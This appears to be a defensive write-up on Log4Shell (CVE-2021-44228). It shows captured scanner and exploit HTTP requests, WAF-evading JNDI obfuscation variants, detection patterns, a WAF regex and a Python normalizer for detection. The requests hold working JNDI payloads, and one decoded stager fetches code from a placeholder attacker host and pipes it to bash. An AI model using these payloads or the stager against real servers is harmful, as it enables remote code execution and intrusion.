This page documents the vulnerability in the Apache Log4j component, CVE-2021-44228 (Log4Shell). Below are examples of requests received by the testsoft web server: scanner probes that detect CVE-2021-44228 and attempts to exploit it.
167.172.233.101 – testsoft.net (this web server)
x.x.x.x – the attacker's IP address
[attackerserver].com – DNS name of the attacker's server
[Base64] – the Base64-encoded part of the payload (abridged)
WEB BOT REQUEST TS-122021-001
Example HTTP request (headers shown one per line):
GET /?x=${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=} HTTP/1.1
Host: testsoft.net
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=}
Referer: http://167.172.233.101:80/?x=${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=}
Accept-Encoding: gzip
Connection: close
The same payload is placed in the query string, the User-Agent and the Referer so that it gets logged whichever of the three the application writes to its log. The User-Agent variant spells out jndi:ldap one character at a time with the ${::-x} default-value syntax (an empty lookup name with default x, which Log4j resolves to x); it evaluates to the same ${jndi:ldap://...} string as the other two. The Referer points at the target itself, so it looks like an ordinary same-site navigation.
Decoded [Base64] payload:
(curl -s x.x.x.x:5874/167.172.233.101:443||wget -q -O- x.x.x.x:5874/167.172.233.101:443)|bash
This is a downloader stage: the /Basic/Command/Base64/ path layout is the one used by the JNDIExploit tool, whose LDAP server answers with a class that runs the decoded command. The script fetched from x.x.x.x:5874 is piped straight into bash, and the victim's own address and port (167.172.233.101:443) are embedded in the download path so the attacker's server can tell which host called back. Outbound connections to port 5874 on the attacker host, or any unexpected curl/wget launched by the Java process, are the indicators to hunt for.
WEB BOT REQUEST TS-122021-002
Example HTTP request:
POST /login HTTP/1.1
User-Agent: Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox
Accept: */*
Host: 167.172.233.101
Content-Type: application/x-www-form-urlencoded
Content-length: 46

data=${jndi:ldap://x.x.x.x:1389/Exploit}
Here the lookup string is carried in the POST body (form field data) and the headers are unremarkable, so filtering only on headers and the URL misses it. Port 1389 is a common default for the attacker-side LDAP server used in Log4Shell exploit kits.
WEB BOT REQUEST TS-122021-003
Example HTTP request:
GET / HTTP/1.1
User-Agent: ${jndi:ldap://x.x.x.x:1389/Exploit}
Host: 167.172.233.101
The minimal form: an unobfuscated lookup in the User-Agent, which almost every web application logs.
WEB BOT REQUEST TS-122021-004
Example HTTP request:
GET /${jndi:ldap://x.x.x.x:1389/Exploit} HTTP/1.1
User-Agent: Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox
Host: 167.172.233.101
Cookie: test='${jndi:ldap://x.x.x.x:1389/Exploit}'
The lookup string is placed in the request path (logged by access logs and by any 404 handler that echoes the path) and in a cookie, with a browser-like User-Agent to avoid attention.
WEB BOT REQUEST TS-122021-005-EXT
Example HTTP request:
GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.[attackerserver].com%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.[attackerserver].com%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.[attackerserver].com%2F%7D HTTP/1.1
Host: testsoft.net
User-Agent: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.[attackerserver].com/}
Connection: close
Transfer-Encoding: chunked
A-IM: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_A-IM.log4jdns.[attackerserver].com/}
Accept: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept.log4jdns.[attackerserver].com/}
Accept-Charset: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Charset.log4jdns.[attackerserver].com/}
Accept-Datetime: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Datetime.log4jdns.[attackerserver].com/}
Accept-Encoding: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Encoding.log4jdns.[attackerserver].com/}
Accept-Language: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Language.log4jdns.[attackerserver].com/}
Access-Control-Request-Headers: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Access-Control-Request-Headers.log4jdns.[attackerserver].com/}
Access-Control-Request-Method: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Access-Control-Request-Method.log4jdns.[attackerserver].com/}
Authorization: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Authorization.log4jdns.[attackerserver].com/}
Cache-Control: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Cache-Control.log4jdns.[attackerserver].com/}
Connection: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Connection.log4jdns.[attackerserver].com/}
Content-Type: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Content-Type.log4jdns.[attackerserver].com/}
Cookie: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Cookie.log4jdns.[attackerserver].com/}
Date: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Date.log4jdns.[attackerserver].com/}
Forwarded: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Forwarded.log4jdns.[attackerserver].com/}
From: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_From.log4jdns.[attackerserver].com/}
If-Match: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Match.log4jdns.[attackerserver].com/}
If-Modified-Since: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Modified-Since.log4jdns.[attackerserver].com/}
If-None-Match: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-None-Match.log4jdns.[attackerserver].com/}
If-Range: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Range.log4jdns.[attackerserver].com/}
If-Unmodified-Since: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Unmodified-Since.log4jdns.[attackerserver].com/}
Origin: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Origin.log4jdns.[attackerserver].com/}
Pragma: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Pragma.log4jdns.[attackerserver].com/}
Proxy-Authorization: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Proxy-Authorization.log4jdns.[attackerserver].com/}
Range: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Range.log4jdns.[attackerserver].com/}
Referer: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Referer.log4jdns.[attackerserver].com/}
TE: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_TE.log4jdns.[attackerserver].com/}
Upgrade: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Upgrade.log4jdns.[attackerserver].com/}
Via: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Via.log4jdns.[attackerserver].com/}
Warning: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Warning.log4jdns.[attackerserver].com/}

${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_body.log4jdns.[attackerserver].com/}
URL-decoded, the three query parameters are id=${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_id.log4jdns.[attackerserver].com/}, page=... and search=... with the parameter name in place of id.
This is a detection probe rather than an exploit delivery. Every injection point (each query parameter, each header, the request body) carries its own hostname under log4jdns.[attackerserver].com, and that hostname encodes the scan identifier (divd-id123456), the timestamp (the ${date:YYYYMMddHHmmss} lookup is evaluated by Log4j on the target, so it is the target's clock) and the name of the injection point. When a vulnerable target evaluates one of the lookups it resolves that name, and the scanner's authoritative DNS server learns exactly which header or parameter reached a vulnerable Log4j instance and when. For the defender the same mechanism works in reverse: an outbound DNS query for a log4jdns name from one of your hosts is proof that a lookup was evaluated, not merely received.
WEB BOT REQUEST TS-122021-006-EXT
Example of the HTTP headers a scanning bot injects into to find vulnerable servers:
GET /?v=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A%3A-r%7D%24%7B%3A%3A-m%7D%24%7B%3A%3A-i%7D%3A%2F%2Fx.x.x.x%3A1442%2Flink%7D HTTP/1.1
Host: testsoft.net
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Encoding: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept: */*
Connection: keep-alive
Referer: https://${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Charset: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Datetime: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Language: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded-For-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
From: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
TE: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
True-Client-IP: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Upgrade: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Via: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Warning: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Max-Forwards: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Origin: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Pragma: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
DNT: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Cache-Control: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-ATT-DeviceId: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Correlation-ID: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Csrf-Token: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-CSRFToken: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Do-Not-Track: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Foo: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Foo-Bar: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-By: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-For-Original: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Host: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Port: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Protocol: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Scheme: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Server: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Ssl: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarder-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forward-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forward-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Frame-Options: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-From: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Geoip-Country: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Destinationurl: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Host-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Method: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-HTTP-Method-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Path-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Https: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Htx-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Hub-Signature: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-If-Unmodified-Since: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Imbo-Test-Config: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Insight: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Ip-Trail: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-ProxyUser-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Requested-With: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Request-ID: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-UIDH: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-XSRF-TOKEN: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Every value here, including the URL-encoded v= query parameter, evaluates to ${jndi:rmi://x.x.x.x:1442/link}: each ${::-c} is an empty lookup name with default c, so the characters of jndi and rmi are assembled only after Log4j resolves the inner lookups, which defeats a WAF rule that looks for the literal string jndi. The header set is chosen for what applications and proxies typically write to logs: client-identity and forwarding headers (True-Client-IP, Forwarded, the X-Forwarded-* family, Via), content negotiation headers, CSRF tokens, correlation and request IDs, and version headers such as X-Api-Version. The Referer value is prefixed with https:// so that it still has the shape of a URL.
Additional links on the topic:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://tryhackme.com/room/solar
https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java
https://www.youtube.com/watch?v=7qoPDq41xhQ
https://github.com/NCSC-NL/log4shell/blob/main/detection_mitigation/README.md
https://github.com/pedrohavay/exploit-CVE-2021-44228
Known lookup-string variants seen in anomalous requests. After the arrow is the string Log4j arrives at once the inner lookups are resolved (env, k8s and sd lookups are assumed to be unset on the target, so their :- default is used; Log4j lower-cases the lookup prefix, so Jndi or JNDi still selects the JNDI lookup):
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://x.x.x.x/} → ${jndi:ldap://x.x.x.x/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://x.x.x.x/} → ${Jndi:LDap://x.x.x.x/}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//x.x.x.x/} → ${jndi:ldap://x.x.x.x/}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//x.x.x.x/} → ${jndi:ldap://x.x.x.x/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://x.x.x.x/} → ${jNdI:rmi}://x.x.x.x/} (as captured; the brace after rmi closes the lookup early, so the RMI URL is cut off)
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.x.x.x/} → ${jndi:ldap://x.x.x.x/}
${${::-j}ndi:rmi://x.x.x.x/} → ${jndi:rmi://x.x.x.x/}
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//x.x.x.x:1389/TomcatBypass/Command/Base64/d2d...[Base64]...mVy}') → t('${jndi:ldap://x.x.x.x:1389/TomcatBypass/Command/Base64/d2d...[Base64]...mVy}') (the /TomcatBypass/Command/Base64/ path is another JNDIExploit layout, carrying a Base64-encoded command)
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//167.172.233.101.[attackerserver].com/link} → ${JNDi:ldap://167.172.233.101.[attackerserver].com/link} (the target's own IP is embedded as a subdomain, so the DNS query alone tells the attacker which host is vulnerable)
%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fx.x.x.x%2Fsecurityscan%7D → URL-decoded ${${::-j}ndi:dns://x.x.x.x/securityscan} → ${jndi:dns://x.x.x.x/securityscan}
Patterns for detecting Log4j exploitation attempts. Match them against both the raw request and its URL-decoded form; the percent-encoded entries cover single and multiple layers of encoding, and the fragments such as j}ndi catch the split-character obfuscations listed above:
%24%7bjndi
%2524%257Bjndi
%2F%252524%25257Bjndi%3A
${jndi:ldap:
${jndi:ldaps:
${jndi:rmi:
${jndi:dns:
${jndi:nis
${jndi:nds
${jndi:corba
${jndi:iiop
${jndi:${lower:
${::-j}${
${env:BARFOO:-j}
${::-l}${::-d}${::-a}${::-p}
${lower:j}ndi:${lower:l}${lower:d}a${lower:p}:
${upper:j}ndi:${upper:l}${upper:d}a${lower:p}:
${::-j}${::-n}${::-d}${::-i}:
$%7Bjndi:
base64:JHtqbmRp
j}ndi$
jndi%
jndi:
j}ndi
j%7Dndi
Example regex for use on a WAF:
(?s)\$\{.+:.+\}
This pattern is deliberately broad: it flags any ${...:...} construct regardless of the lookup name, so it also matches the obfuscated variants above, but it equally matches harmless text of the same shape (template placeholders, JSON values containing ${), and with (?s) and the greedy .+ it is evaluated across the whole request rather than a single token. Treat its hits as candidates for review and use the narrower jndi patterns above where false positives matter. It does not match the percent-encoded forms unless the WAF URL-decodes the request before applying the rule.
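The following Python script is an added example, not code from the original page or from any tool it links to. It implements the detection idea behind the variant list and the pattern list above and applies it to the request samples on this page: it URL-decodes a value repeatedly (for double- and triple-encoded probes), evaluates the obfuscating inner lookups the way Log4j 2 would on a host where the referenced env/k8s/sd variables are unset (${::-x}, ${env:NAME:-x}, ${lower:x}, ${upper:x}, ${date:...}), and then looks for ${jndi:<scheme>:...} in the normalized string. It also walks a raw HTTP request header by header and decodes the /Base64/ command segment seen in TS-122021-001. The obfuscated strings are copied from this page; the request text and the Base64-encoded stager URL are constructed for the example, and the <date> stand-in and the \x00 parking marker are the example's own conventions.

```python
"""Normalize Log4Shell lookup obfuscation and extract the JNDI target.
Added example; not code from the original page."""
import base64
import re
from urllib.parse import unquote

# An innermost ${...}: a lookup with no further "${" inside it.
_INNER = re.compile(r'\$\{([^${}]*)\}')
# A jndi lookup after normalization: ${jndi:<scheme>:<rest>}
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:(.*?)\}', re.I)
_HEADER = re.compile(r'^([A-Za-z0-9-]+):\s')
_B64_SEG = re.compile(r'/Base64/([A-Za-z0-9+/=_-]+)')


def _resolve(body):
    """Evaluate one innermost lookup body the way Log4j 2 does on a host where
    the referenced variable is unset. Returns None if the lookup must be kept
    as-is (the jndi lookup itself, or a lookup this example does not model)."""
    if ':-' in body:                                  # ${name:-default}
        name, default = body.split(':-', 1)
        # Log4j resolves `name` first and only falls back to `default` if that
        # fails, so ${jndi:ldap://h/x:-y} still fires the JNDI lookup.
        if re.match(r'\s*jndi\s*:', name, re.I):
            return None
        return default
    prefix, sep, key = body.partition(':')
    prefix = prefix.lower()
    if sep and prefix == 'lower':
        return key.lower()
    if sep and prefix == 'upper':
        return key.upper()
    if sep and prefix == 'date':                      # ${date:pattern}
        return '<date>'
    return None


def url_decode(s, rounds=3):
    """Strip up to `rounds` layers of percent-encoding (double-encoded probes)."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def normalize(s):
    """Collapse nested lookups inside-out until only unresolvable ones remain."""
    s = url_decode(s)
    while True:
        m = _INNER.search(s)
        if not m:
            break
        value = _resolve(m.group(1))
        if value is None:
            value = '\x00{' + m.group(1) + '}'        # park it so the scan moves on
        s = s[:m.start()] + value + s[m.end():]
    return s.replace('\x00{', '${')


def is_jndi_probe(text):
    """Loose check: any ${jndi: left after normalization, even if malformed."""
    return re.search(r'\$\{\s*jndi\s*:', normalize(text), re.I) is not None


def extract_jndi(text):
    """Every well-formed JNDI target URL (scheme lower-cased) after normalization."""
    hits = []
    for m in _JNDI.finditer(normalize(text)):
        rest = m.group(2).split(':-', 1)[0]           # drop a trailing :-default
        hits.append(m.group(1).lower() + ':' + rest)
    return hits


def scan_request(raw):
    """Scan a raw HTTP request line by line; returns (location, jndi_url) pairs."""
    findings = []
    for i, line in enumerate(raw.splitlines()):
        h = _HEADER.match(line)
        where = 'request-line' if i == 0 else (h.group(1) if h else 'body')
        findings.extend((where, url) for url in extract_jndi(line))
    return findings


def decode_command_segment(jndi_url):
    """JNDIExploit-style paths carry the shell command as .../Base64/<b64>."""
    m = _B64_SEG.search(jndi_url)
    if not m:
        return ''
    seg = m.group(1).replace('-', '+').replace('_', '/')
    seg += '=' * (-len(seg) % 4)
    return base64.b64decode(seg).decode('utf-8', 'replace')


# Constructed sample: request TS-122021-004 from this page plus the POST body of
# TS-122021-002, so that request line, header and body injection are all present.
SAMPLE_REQUEST = (
    "GET /${jndi:ldap://x.x.x.x:1389/Exploit} HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox\r\n"
    "Host: 167.172.233.101\r\n"
    "Cookie: test='${jndi:ldap://x.x.x.x:1389/Exploit}'\r\n"
    "\r\n"
    "data=${jndi:ldap://x.x.x.x:1389/Exploit}\r\n"
)
# Constructed: the decoded stager from TS-122021-001, re-encoded into a JNDI URL.
STAGER = ("(curl -s x.x.x.x:5874/167.172.233.101:443"
          "||wget -q -O- x.x.x.x:5874/167.172.233.101:443)|bash")
STAGER_URL = ("ldap://x.x.x.x:12344/Basic/Command/Base64/"
              + base64.b64encode(STAGER.encode()).decode())

if __name__ == '__main__':
    for where, url in scan_request(SAMPLE_REQUEST):
        print(where, '->', url)
    print(decode_command_segment(STAGER_URL))
```

Two design points. First, normalization is done inside-out exactly as Log4j's substitution does, so a match on the normalized string is a statement about what the vulnerable library would have executed rather than about what the attacker typed; the plain-text pattern list above is still needed on the WAF, but this is the check to run over logs when deciding whether a probe was real. Second, `is_jndi_probe` and `extract_jndi` are kept separate on purpose: the truncated ${jNdI:rmi}://... variant from the list above is clearly hostile but yields no usable URL, and a responder wants both signals.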